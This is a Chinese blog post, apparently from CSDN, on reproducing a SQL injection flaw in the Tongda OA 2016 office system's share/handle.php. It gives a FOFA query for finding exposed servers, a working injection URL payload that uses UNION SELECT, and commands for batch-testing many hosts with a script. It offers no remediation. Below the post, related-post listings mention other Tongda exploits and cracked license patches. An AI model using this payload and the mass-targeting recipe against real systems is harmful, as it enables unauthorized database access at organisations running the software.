通达OA 2016网络智能办公系统 handle.php SQL注入漏洞

最新推荐文章于 2024-05-26 15:47:19 发布
最新推荐文章于 2024-05-26 15:47:19 发布
阅读量1.2k 收藏 1
点赞数
文章标签: web安全 网络安全 系统安全 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CommputerMac/article/details/133869825
版权

一、漏洞描述

北京通达信科科技有限公司通达OA2016网络智能办公系统 handle.php 存在sql注入漏洞,攻击者可利用此漏洞获取数据库管理员权限,查询数据、获取系统信息,威胁企业单位数据安全。

二、网络空间搜索引擎查询

fofa查询

app="TDXK-通达OA" && body="2016"

三、漏洞复现

poc

/share/handle.php?_GET[module]=1%27+and+1={`=%27`+1}+and+1=0+union+select+(select/**/user())--+%27

浏览器直接访问

四、批量检测

单个检测

 python .\TdOA2016.py -u  http://ip:port

批量检测

 python .\TdOA2016.py -u filename

微信公众号关注 网络安全透视镜 回复 20231016 获取批量检测脚本

为赋新词强说愁
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通达oasharehandle.phpsql注入漏洞(含批量验证poc)
weixin_43567873的博客
04-07 117
通达oasharehandle.phpsql注入漏洞(含批量验证poc)
漏洞复现】通达oa 前台sql注入
失心少年
11-19 548
它涵盖了企业日常办公所需的各项功能,包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用,可以实现随时随地办公,提高工作效率和协作能力。同时,它还具备高度可定制性和扩展性,可以根据企业的实际需求进行定制开发,满足企业的个性化需求。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
通达OA远程命令执行+任意用户登录漏洞复现
z.mumu的博客
12-17 1318
通达OA漏洞复现 环境搭建 https://pan.baidu.com/s/1m0MyzHVaYOfTOR3LaekVgQ 提取码:jvcj 1. 任意用户登录 影响版本:通达OA2017,V11.X<V11.5 通达oa远程命令执行 影响的版本有:V11版,2017版,2016版,2015版,2013增强版,2013版 首先开启burp抓取登入页面数据包 2. 修改数据包 1. 修改路径为 `logincheck.php``为``logincheck_code.php`。 2. 删除Cook
通达OA前台任意用户登录漏洞+RCE漏洞复现
热门推荐
szgyunyun的博客
07-03 1万+
用老弟的服务器搭了个靶机就不打码了用完就关了 任意用户登录:影响版本:通达OA2017,V11.X<V11.5 通达oa远程命令执行:影响的版本有:V11版,2017版,2016版,2015版,2013增强版,2013版。 1、任意用户登录 1)登录处抓包 2)修改再发包 需修改以下三个地方: /logincheck.php /logincheck_code.php 删除cookie在post包中添加UID=1 3)用获取的SESSID访问/general/ 未授权文件上传 任意文
sql注入漏洞_通达OA 后台多个SQL注入漏洞
weixin_39820244的博客
12-09 846
近日,深信服安全团队监测到通达OA后台存在多个SQL注入漏洞的信息。漏洞利用需要具备普通用户权限,攻击者可通过拼接SQL语句,来执行恶意的SQL代码, 或获取数据库敏感数据。漏洞名称:通达OA 后台多个SQL注入漏洞威胁等级:高危影响范围:通达OA < V11.6、通达OA <= V11.7漏洞类型:SQL注入利用难度:中等漏洞分析1通达OA介绍通达OA(Office An...
漏洞复现】通达OA share/handle.php身份认证绕过漏洞
最新发布
weixin_42620428的博客
05-26 428
通达OA(Office Anywhere网络智能办公系统)是由通达信科科技自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。
通达OA2016集团版全功能支持所有移动端完美破解补丁
07-16
Office Anywhere产品包含300多个标准化的功能组件。电子邮件、手机短信、微讯、即时通讯、论坛和讨论区等功能组件,建立起企业内部沟通和通讯平台;公告通知、新闻管理、日程管理、工作计划、工作日志、投票管理等功能组件,建立起企业行政办公平台;工作流系统提供灵活、可视化的“智能表单设计器”和“流程设计器”,提供完备的流程处理、监控、超时催办、数据分析等功能,建立起企业流程处理平台;公文管理、项目管理、人力资源、智协同、任务中心等子系统和功能组件,建立起企业业务处理平台;文件柜、网络硬盘、图片浏览、OA知道、维基百科、文档检索中心等功能组件,建立起企业知识管理平台;会议管理、车辆管理、固定资产管理、办公用品管理、图书管理、档案管理、通讯薄等功能组件,建立起企业资源管理平台。产品全面支持移动办公,可在iOS和Andriod两大平台下的手持移动设备上完成流程的办理和审批、收发邮件、查看新闻、公告等功能。产品更进一步提供即时通讯、手写签章、视频会议、附件加密等10多个实用的扩展组件,进一步丰富了产品功能,满足了不同行业、不同层次的客户需求
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA sql注入漏洞.zip
08-24
`CVE-2023-4166.py`很可能是一个Python脚本,设计用于模拟攻击行为,检测或演示通达OA系统中的SQL注入漏洞。`requirements.txt`文件列出了执行此脚本所需的所有Python库,这些库可能包括网络请求工具如`requests`,...
通达OA2016版破解补丁(包含应用自建平台)
09-16
通达OA2016版破解补丁,支持不限制用户数量,不限制时间,报表模板不限制数量。 测试完全可用!
通达OA破解补丁2016-9.10(2017-03-26制作)
03-26
通达OA2016破解补丁安装步骤: ============================= 1、到官网下载OA2016最新版服务端安装包、用户PC端办公精灵、手机端下载址:http://www.tongda2000.com/download/2016.php 2、安装OA服务端到电脑或服务器或云主机或VPS主机 3、安装完,在OA服务管理器(MYOA\BIN\monitor.exe)中关闭所有OA服务,并退出服务控制器monitor.exe。 4、替换补丁中bin和webroot里的文件。直接复制粘贴就可以。 5、到D:\MYOA\BIN目录运行monitor.exe 并启动OA所有服务 6、检查OA所有服务是否正常开启。 7、在OA服务端上打开浏览器,输入http://localhost按提示升级(如果设置了端口的,末尾加上:端口号) 如果未出现“开始升级”,请检查MYOA\webroot\attachment\update下是否有lock.txt,有测删掉后重新打开OA登录页面,点击开始升级!!! 8、登录OA后按F5刷新网页,并到【系统管理】=》【系统资源管理】=》【资源监控】=》【系统缓存数据】=》更新系统缓存数据。 9、系统管理-->定时任务管理-->检查系统更新-->设置-->关闭系统更新!!!!这步一定要做!要仔细检查! 正式使用时删除演示数据 10、到【系统管理】=》【系统资源管理】=》【演示数据清理】=》根据需要全删除或只删除单位、部门、用户、工作流。然后做一次第9步即可刷新单位、部门信息,删除完数据按第8步刷新OA缓存。 =============================
主打开放互联,通达OA2016带你轻松玩转工作圈
chuangshizhan0229的博客
08-24 156
移动互联的今天,微信的发展自然方兴未艾,当其几乎成为每一位职场人士手机社交工具标配的时候,微信连接一切的目标也慢慢成为现实,大家通过微信愉快的聊天,自由的交流,刷朋友圈感受彼此的存在感,甚至找回失散多年的大学同学、高中同学、初中同学……曾几何时,大家发现部门同事之间建立一个微信群,就可以很好的...
通达OA 身份认证绕过漏洞复现
12-12 1571
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
通达oa精灵的下载步骤_通达OA精灵2016版官方下载_通达OA精灵2016版电脑版_通达OA精灵201620161212-华军软件园...
weixin_31244759的博客
01-17 498
通达OA精灵2016通达OA网络智能办公系统的移动版软件,通达OA是国内领先的办公软件产品,已拥有上万家企事业单位用户。移动版提供了邮件、公告通知、日程安排、通讯薄、工作流、微讯等功能模块。其中,微讯作为移动版的主要功能之一,体现统一通讯理念。相似软件版本说明软件地址1.0 官方版查看1.5.0.8 安卓版查看3.7.2 安卓版查看6.9.131查看3.0.2查看借助通达云数据中心技术,与OA及...
通达OA RCE远程代码执行漏洞分析(含EXP&POC)
风起的博客
04-27 7238
目录前记任意文件上传分析任意文件包含漏洞奇淫巧技官方修复补丁POC&EXP利用后记 前记     在上个月,通达OA爆出了任意文件上传及任意文件包含漏洞,影响版本非常广,这两个漏洞结合可以获取shell权限,为什么在漏洞爆出一个月后我才写这篇文章呢,因为我也是最近才看到的。所以我也赶忙的写完EXP和POC就发了这篇文章,下面我会从代码层进行审计,分析...
通达OA漏洞分析合集
不忘初心,护天下安全!
06-21 4236
通达OA是一套使用比较广泛的办公系统。随着国家护网的开展,通达OA成为渗透人员优先尝试的目标,暴露出了大量漏洞,以下进行介绍。判断通达版本爆破用户、邮箱GET 参数可获取username、email获得计算机名 通达OA v2014 app="TDXK-通达OA" app="TDXK-通达OA" && (title="2013" || title="2015")通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏
通达OA SQL注入漏洞【CVE-2023-4166】
holyxp的博客
08-10 4546
通达OA系统,即Offic Anywhere,又称为网络智能办公系统,是通达科技公司针对各行业办公与管理开发的办公应用系统通达OA系统采用领先的B/S架构,采用基于WEB网络的开发方式,能够使得企业及个人办公不再受地域限制,实现信息化、自动化、移动化高效便捷办公漏洞2(CVE-2023-4166)general/system/seal_manage/dianju/delete_log.php文件,对参数 DELETE_STR 的操作会导致 sql 注入。
通达OA后台SQL注入到RCE
box
09-18 2021
0x00 前戏 一趟护网下来大佬们收割了一大波0day,奈何自己没有没有技术,只能打打靶机。 可能是自己比较菜原因,复现过程中遇到不少坑。 0x01 测试环境 测试版本:11.5.200417 版本 限制条件:需要账号登录 大佬们说是 通达OA v11.7版本,但是试了试 11.5.200417 版本也是同样存在 SQL注入的,更惊喜的是,刚好可以使用11.5版本的前台任意用户登录漏洞,绕过登录需要登录这一条件。 漏洞原理代码分析可以参考云川安全团队的师傅的文章 0x02 漏洞复现 漏洞url:http:
泛微oa e-cology v9 browser.jsp sql注入漏洞
09-15
泛微OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据或者对系统进行非法操作。 泛微OA E-Cology V9中的browser.jsp页面是用于显示OA系统中的个人文件夹和公共文件夹。攻击者可以在该页面中输入恶意的SQL语句,通过执行这些恶意SQL语句,攻击者可以获取到不应该被访问的数据,比如其他用户的文件,甚至可以对数据库进行修改和损坏。 为了防止SQL注入漏洞的利用,可以采取以下措施: 1. 输入过滤和验证:在服务器端对用户输入的数据进行过滤和验证,去除或转义可能包含恶意SQL代码的字符,确保只接受合法的输入。 2. 使用参数化查询:尽量使用参数化查询代替拼接SQL语句的方式,参数化查询可以预编译SQL语句,避免在拼接时引入恶意代码。 3. 限制数据库用户的权限:对数据库用户进行权限控制,确保每个用户只拥有最小必要的权限,减少攻击者利用SQL注入漏洞进行非法操作的机会。 4. 及时更新和修补漏洞:及时跟进厂商的安全通告并安装最新的补丁程序,确保系统始终处于最新的安全状态。 综上所述,泛微OA E-Cology V9中的browser.jsp页面存在SQL注入漏洞,但通过合理的安全措施和注意事项,我们可以有效地减少该漏洞被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值